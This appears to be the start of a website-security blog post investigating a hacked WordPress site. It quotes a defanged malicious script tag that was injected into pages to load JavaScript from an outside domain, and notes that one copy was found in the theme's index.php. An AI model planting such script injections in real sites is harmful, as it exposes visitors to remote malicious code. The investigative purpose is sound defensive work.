A few days ago I investigated a hack where the following script was injected into web pages:
<sc ript src="hxxp://www .copytech .lu/js/java.js"></script>
The script was at the very top of the HTML code and in the middle of the page. It was a WordPress site so I suggested to check the index.php and theme files for the malicious code.
The topmost script was indeed in the theme’s index.php file. But theme files didn’t contain the script that I found in the middle of web pages’ HTML code.